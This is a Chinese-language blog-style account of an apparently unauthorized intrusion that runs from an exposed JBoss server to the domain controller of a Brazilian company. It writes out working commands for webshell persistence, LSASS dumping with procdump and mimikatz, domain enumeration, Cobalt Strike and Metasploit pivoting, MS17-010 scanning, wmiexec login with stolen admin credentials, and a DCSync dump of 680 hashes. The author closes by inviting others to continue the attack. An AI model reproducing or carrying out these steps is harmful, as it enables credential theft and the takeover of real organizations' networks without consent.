从外围打点到内网渗透拿下域控

• 0x00 前言

小弟不才，学了点内网知识就想练练手，社工一个fofa会员就跑了一手jboss的站，跑完之后无聊的时候就拿拿shell，看看有没有域环境熟悉下dos命令。

这不，看到一个看起来比较好的站，就决定看一看他到底是何方神圣。

• 0x01 外围打点

Jboss界面都不说了哈老铁们，进去看了一下jmx console直接秒进，真好。

不过不急，war远程部署虽然可以用，jexboss集成工具岂不是更香？

拿出jboss扫描神器jexboss扫描一手，不扫不知道一扫吓一跳，有3个漏洞都可以利用，不得不说管理员还是很疏忽大意的。

直接选了个jmx-console，直接省去了手动部署的麻烦，给我弹了个shell回来，一发whoami，system权限，是真不错，准备ipconfig看一发是否有双网卡却碰了壁，不知道这是他禁了这个命令还是我连接不好的原因。

因为jexboss拿的终究是交互式shell，不稳定随时有掉线可能，所以我决定先冰蝎上个线，至少不能让这条system权限的鱼就这样跑掉。dir命令看一下它jboss的路径

echo冰蝎写个马进去，成功连接，至此打点成功，这里后来查看了目录下的文件，有一个名叫jboss的xml文件，我为了隐蔽起见，将名字改成了jboss.jsp

• 0x02 本机信息搜集

拿到webshell后先维权往其他几个目录也放几个webshell，防止被管理员删除修复

然后依托当前机器收集尽可能多的信息，迅速了解目标的内网大致网络结构和机器软件环境，为下一步继续深入做好准备

ipconfig /all &&netstat -ano
&&arp -a查看当前机器处于哪个环境哪个网段

wmic os get
caption,csdversion,osarchitecture,version 抓明文之前了解目标系统版本
有些默认是抓不到明文的

wmic product get name,version 查看安装软件列表

whoami /user &&quer user 

tasklist /v && net start 

systeminfo

可以看到我们这里拿的是一台2008r2的主机，虽然没有双网卡，但是在域内

然后在本机里不断的寻找有用的消息

找到一个pdf里面有一个网站

尝试访问，拒绝的原因是这个网站只允许内部网络访问，看来安全性还是挺高的

拿着这个名字去搜索得到这是一家位于巴西圣保罗的公司

因为系统里的文件太多且太杂，可能有些有用的文件并没有让我发现找到，但是在一份账单里面得到了他官网的地址xxxx.com.br，不过咱也不是巴西人，也看不懂葡萄牙语是吧，那只能英语翻译走一手了

粗略看了一下地址也是在圣保罗，那应该十有八九这个就是他的主站，位置就在巴西的圣保罗

用在线子域名扫描发现很多子域名都解析在了我拿到shell这个ip地址（186.xxx.xxx.xxx）上，当时就有一种这个域并不是很小的感觉

信息搜集得差不多了，我决定先把他密码抓出来，用抓取dmp回本地离线mimikatz解密的方法

先tasklist /svc查看一下杀软情况

扫描的话是没有杀软的，那么就不用做免杀了

用procdump导出

procdump64.exe -accepteula -ma lsass.exe 1.dmp

利用windows自带的压缩文件下载回本地

makecab c:\jboss\bin\1.dmp  1.zip

看到压缩后的大小还是小很多的，下载回来的速度也会更快

mimikatz离线读取得到域管Administrator的密码

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

• 0x03 域内信息收集

net view /domain 查看域

net view /domain:域名称 查看域内用户

net group “domain computers” /domain 查询所有域成员计算机列表

我这张截图还只是C开头的主机并且还没有结束，粗略估计了一下这一个大域里面至少有4.500台主机

net accounts /domain获取域密码信息

看了一下最多180天密码过期

nltest /domain_trusts 获取域信任信息

net user /domain 向AD域用户进行查询

向AD查询的用户就更多了，估计远不止4.500台，是一个非常庞大的域，因为几乎他三分之二的子域名都解析到了我拿到这个shell的ip上

wmic user account get /all获取域内用户详细信息

将详细信息导出到excel，方便信息归类

dsquery user 查看存在的用户

net group “domain admins” /domain 查询域管理员用户

域管用户大概10多个

net group “Domain Controllers” /domain 查询域控

得到DC1的ip为192.168.21.3，DC2的ip为192.168.21.108，且都在我拿到权限的这个机器的域内

这里既然找到了域控，先看一下能不能利用gpp组策略

dir \\主机名\NETLOGON

dir \\主机名\SYSVOL

这里看了一下两台主机虽然都有vbs和bat，但是bat里并没有有用信息可以利用

这里我尝试把ntds.dit导出进行查看，但是拒绝访问，是因为ntds并不在默认目录，我试着用命令进行查找也失败，遂放弃

• 0x04 获取域内spn记录

摸清域内敏感机器资产的分布，方便之后突破。可以拿着这些获取到的机器名，来快速完整探测当前域内的所有存活主机，通过net view还是比较不准的，开启防火墙也是探测不到的

setspn -T xxx.com -Q */* >spn.txt

接着对拉回来的spn文件进行处理，获取spn记录前面的主机名字

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

通过SPN我们可以获取到域内的存活主机何一些主机的具体作用。可以通过主机的名字来获取到这个主机提供什么服务

除了SPN收集域内的信息的话，还可以通过bloodHound来获取域内的一些信息。接着快速抓取当前域内的所有用户，组，会话，数据，上传exe文件上去然后再把数据给下载回来

• 0x05 内网存活机器及资产搜集

本来这里是准备用venom将msf带进内网打的，但是不知道为什么虽然没有杀软，就是传不上去，把几个内网穿透的软件都试完了，就是上传不上去

一开始我以为是我这边的问题，所有文件都传不上去，但是我试了一张png就能够上传上去，那么肯定是把我上传的文件直接给拦截了

我想这既然不能上传，能不能下载呢

先在本地测试一下是能够下载的

但是一换到被攻击机上就下载不下来了，真是离谱

一筹莫展之时我想起来一个大杀器我从头到尾都没有使用过，那就是cs多人运动

我想它是出网的而且又没有杀软，虽然文件下载不知道是什么鬼问题，但是应该是能够上的吧

真好，又出现了一丝生机，上号cs多人运动

因为之前已经把本机及域内信息搜集得差不多了，就只扫描了一个网段

C段里面大概100多台主机，但我估计并不只这么多，因为有些开防火墙我用arp扫描是探测不到的

不知道是不是我个人习惯的原因，我觉得cs在信息搜集方面确实能起到很多作用，但是真要进内网打还是看msf

所以我还是执念上msf去打，新增一个msf监听器把cs的对话派生给msf

新建一个192.168.21.0段的路由表

这里我一开始是要扫描的ip放到了一个txt里，想直接对txt进行扫描，但是不知道是我操作错误的原因还是啥问题，不能够批量扫，那就只能手动去搞了

这里搞了一段时间，域内扫完整理出来如下：

• 0x06 拿下DC获取hash

对内网的主机进行MS17-010漏洞探测，域内机器扫出来9台，本来这个地方可以用msf获取meterpreter后用Kiwi读取密码进行整理的，但是我觉得这个C段太大了，我就没有一台一台的获取session

我想的是如果我拿到了DC，直接就可以把整个域内成员hash导出来，就节省了大量时间

一般拿到DC都会象征性的登录远程桌面作个纪念，但是这个地方我没有登录截图，原因我下面会解释

这里我直接用cs上传wmiexec.py连接DC

python3 ./wmiexec.py sxxxx/Administrator:密码@192.168.21.3

用mimikatz导出hash

lsadump::dcsync /domain:xxx /all /csv command

这个地方我截图导出来的hash其实是很少一部分，我将导出来的hash放入excel，这里我为了方便看我在每个hash中间都加了一个空行

这是结束时候的截图，因为我加了空格，计算的话一共导出了680个用户的hash，也就是说这些用户的hash还不只是这个C段主机的hash

也就是说可能我拿的这个DC所在的这个域还有可能是个子域，这就很恐怖了，所以这里我没有打草惊蛇去登录它的远程桌面，这里我想的是用cs联动bloodhound进行更详细的分析，但奈何现在bloodhound还用得不太熟，就此作罢

• 0x07 后记

我想说的还有一个点是在内网渗透的过程中思路一定要清晰，要做好信息的整合，当你收集到一些有用的信息时就要及时的整理好，不然到后面再去找就会很麻烦，比如hash、spn、wmic收集到的域内用户详细信息，都要做好及时的整理

当时在扫子域名的时候我就预感到这个域不会是很小，但是也没有想到这个域有这么大，我拿下的可能是主域下一个很小的域，因为这个域是在是太庞大了，需要耗费巨大的精力和时间去研究，而且现在有些地方知识也储备得不是很足，如果有师傅想继续往上研究的话可以联系一下小弟，其实我也想看看这个域究竟会有多大，未完待续